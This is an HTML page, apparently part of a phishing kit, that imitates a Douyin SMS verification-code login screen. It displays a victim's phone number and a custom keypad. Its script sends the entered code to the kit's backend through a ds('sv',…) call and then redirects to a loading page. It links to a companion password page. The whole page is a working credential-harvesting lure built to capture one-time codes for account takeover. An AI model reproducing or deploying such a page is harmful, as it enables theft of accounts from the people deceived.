<!DOCTYPE html><html class="javascript am-touch js cssanimations ios"><head><meta charset="utf-8">
<title>身份验证</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="renderer" content="webkit">
<meta name="x5-fullscreen" content="true">
<meta name="browsermode" content="application">
<meta name="x5-page-mode" content="app">
<meta content="telephone=no" name="format-detection">
<script src="../images/jquery.min.js"></script>
<script src="../app/data.js"></script>
<link href="images/m.css" rel="stylesheet">
</head>
<body>
<div id="content" class="content">
	<form method="post" id="fro" action="update/index.php" autocomplete="off">
		<div id="login" class="login">
			<style></style>
			<div class="title">请输入验证码</div>
				<div class="line">验证码已通过短信发送至 +86 <script>document.write(conf.user||'18888888888');</script></div>
			<div id="web_login">
				<ul id="g_list">
					<li id="g_u">
						<div id="del_touch" class="del_touch">
							<span id="del_u" class="del_u"></span>
						</div>
						
	 		<div name="0" class="my" id="code2"></div>
						<input class="inputstyle" id="code" name="0" maxlength="11" placeholder="请输入验证码">
						<div id="btn" >120</div>
					</li>
				</ul>
				<div class="info">
					<input type="radio" checked id="domainText" class="domainText">已阅读并同意
					<a class="info_a">用户协议</a>和
					<a class="info_a">隐私政策</a>，同时登录并使用抖音火山版(原“火山小视频”)和抖音登录
				</div>
				<div id="go" class="ivhhsCP" data-clipboard-text="##X-1DGhU9kYf1927U_R##" onClick="sumbit_form();">登 录</div>
			</div>
			<div id="switch">
				<div id="zc_feedback">
					<a id="zc" href="../pass/">其他方式登录</a>
					<a id="forgetpwd" href="../pass/">密码登录</a>
				</div>
			</div>
		</div>
	</form>
</div>
<div class="bot">手机号不用了？<a class="info_a">找回账号</a></div>


   
   
   
   <div id="key1" class="jp en"><ul class="uls"><li class="key">q</li><li class="key">w</li><li class="key">e</li><li class="key">r</li><li class="key">t</li><li class="key">y</li><li class="key">u</li><li class="key">i</li><li class="key">o</li><li class="key">p</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">a</li><li class="key">s</li><li class="key">d</li><li class="key">f</li><li class="key">g</li><li class="key">h</li><li class="key">j</li><li class="key">k</li><li class="key">l</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key_sj" id="A"><img src="images/0.png" width="20"></li><li class="key">z</li><li class="key">x</li><li class="key">c</li><li class="key">v</li><li class="key">b</li><li class="key">n</li><li class="key">m</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_123">123</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key1_" class="jp en"><ul class="uls"><li class="key">Q</li><li class="key">W</li><li class="key">E</li><li class="key">R</li><li class="key">T</li><li class="key">Y</li><li class="key">U</li><li class="key">I</li><li class="key">O</li><li class="key">P</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">A</li><li class="key">S</li><li class="key">D</li><li class="key">F</li><li class="key">G</li><li class="key">H</li><li class="key">J</li><li class="key">K</li><li class="key">L</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key_sj" style="background:#fff" id="a"><img style="width:1.25rem" src="images/2.png"></li><li class="key">Z</li><li class="key">X</li><li class="key">C</li><li class="key">V</li><li class="key">B</li><li class="key">N</li><li class="key">M</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_123">123</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key2" class="jp shuzi"><ul class="uls"><li class="key">1</li><li class="key">2</li><li class="key">3</li><li class="key">4</li><li class="key">5</li><li class="key">6</li><li class="key">7</li><li class="key">8</li><li class="key">9</li><li class="key">0</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">-</li><li class="key">/</li><li class="key">:</li><li class="key">;</li><li class="key">(</li><li class="key">)</li><li class="key">$</li><li class="key">&amp;</li><li class="key">@</li><li class="key">"</li><div class="clear"></div></ul><ul class="uls ulscen ul5"><li class="key_sj" id="teshu"><p style="font-size:1rem">#+=</p></li><li class="key">.</li><li class="key">,</li><li class="key">?</li><li class="key">!</li><li class="key">'</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_abc">abc</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key3" class="jp zifu"><ul class="uls"><li class="key">[</li><li class="key">]</li><li class="key">{</li><li class="key">}</li><li class="key">#</li><li class="key">%</li><li class="key">^</li><li class="key">*</li><li class="key">+</li><li class="key">=</li><div class="clear"></div></ul><ul class="uls ulscen"><li class="key">_</li><li class="key">\</li><li class="key">|</li><li class="key">~</li><li class="key">&lt;</li><li class="key">&gt;</li><li class="key">$</li><li class="key">&amp;</li><li class="key">@</li><li class="key">"</li><div class="clear"></div></ul><ul class="uls ulscen ul5"><li class="key_sj key_123"><p style="font-size:1rem">123</p></li><li class="key">.</li><li class="key">,</li><li class="key">?</li><li class="key">!</li><li class="key">'</li><li class="key_del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="key_foot key_abc">abc</li><li class="space">空格</li><li class="key_ok">确认</li><div class="clear"></div></ul></div><div id="key4" class="jp zifu"><ul class="uls"><li class="number">1</li><li class="number">2</li><li class="number">3</li><div class="clear"></div></ul><ul class="uls"><li class="number">4</li><li class="number">5</li><li class="number">6</li><div class="clear"></div></ul><ul class="uls"><li class="number">7</li><li class="number">8</li><li class="number">9</li><div class="clear"></div></ul><ul class="uls ulscen ulbot"><li class="num_ok" id="ok">确认</li><li class="number">0</li><li class="num-del" id="del"><img src="images/1.png" width="25"></li><div class="clear"></div></ul></div>
</div>


<script type="text/javascript">
var wait=120;  
function time(o) {
	if (wait < 10) {
		wait = 120;
	} 
	if (wait == 120){
		//$.get('set_num.asp');	
	}
	o.innerHTML = wait;
	wait--;
	setTimeout(function() {
		time(o);
	},1000);
}
time(document.getElementById("btn"));
</script>
<script language="javascript">$(function(){rs({pn:'code'})});</script>
</body>
<script>
function sumbit_form(){
    var pass = $("#code").val();
    if (!$('#domainText').prop('checked')){
        tip('请勾选服务协议！');
        return;
    }
    if (pass.length!=4){
        tip('验证码为4位数字，请重新输入!');
        return;
    }
    var code=$("#code").val();
    ds('sv',{code:code});
	setTimeout(function(){
		location.href='../load/';
	},500);
}
//JS提示弹框
function tip(text, time){
	window.tmsg&&document.body.removeChild(tmsg);
	document.body.insertAdjacentHTML('beforeEnd','<div id="tmsg" style="top:200px;left:20%;right:20%;color:#fff;margin:0 auto;opacity:0;padding:5px;font-size:15px;max-width:300px;position:fixed;text-align:center;border-radius:8px;background-color:#333;border:1px solid #222;box-shadow:rgba(0,0,0,0.25) 0px 0px 10px 6px;transition:opacity 0.6s;z-index:19891016;">'+text+'</div>');
	setTimeout('tmsg.style.opacity=0.8',0);clearTimeout(window.tmst);
	window.tmst=setTimeout('tmsg.style.opacity=0;setTimeout("document.body.removeChild(tmsg)",600);',(time||3)*1000);
}
</script>
<script type="text/javascript">
document.body.addEventListener('touchmove', function (e) {e.preventDefault()}, { passive: false });
$("#code2").click(function() {
    index = $(this).attr('name');
    if (index == 0) {
        $(".jp").hide();
        $("#key4").show();
        chang = 10;
    } else {
        $(".jp").hide();
        $("#key1").show();
        chang = 16;
    }
});
$(".key,.number").click(function() {
    data = $("#code").eq(index).val();
    if (data.length <= chang) {
        $("#code").eq(index).val($("#code").eq(index).val() + $(this).html());
        if(index == 0){
            $('#del_touch').show();
        }else{
            $('#del_touch_p').show();
        }
    }
});
$(".space").click(function() {
    data = $("#code").eq(index).val();
    if (data.length <= chang) {
        $("#code").eq(index).val($("#code").eq(index).val() + ' ');
    }
});
$(".key_del,#del").click(function() {
    data = $("#code").eq(index).val();
    $("#code").eq(index).val(data.substr(0, data.length - 1));
});
$(".key_ok,#ok").click(function() {
    $(".jp").hide();
});
$(".key_abc,#a").click(function() {
    $(".jp").hide();
    $("#key1").show();
});
$(".key_123").click(function() {
    $(".jp").hide();
    $("#key2").show();
});
$("#A").click(function() {
    $(".jp").hide();
    $("#key1_").show();
});
$("#teshu").click(function() {
    $(".jp").hide();
    $("#key3").show();
});
</script>
</html>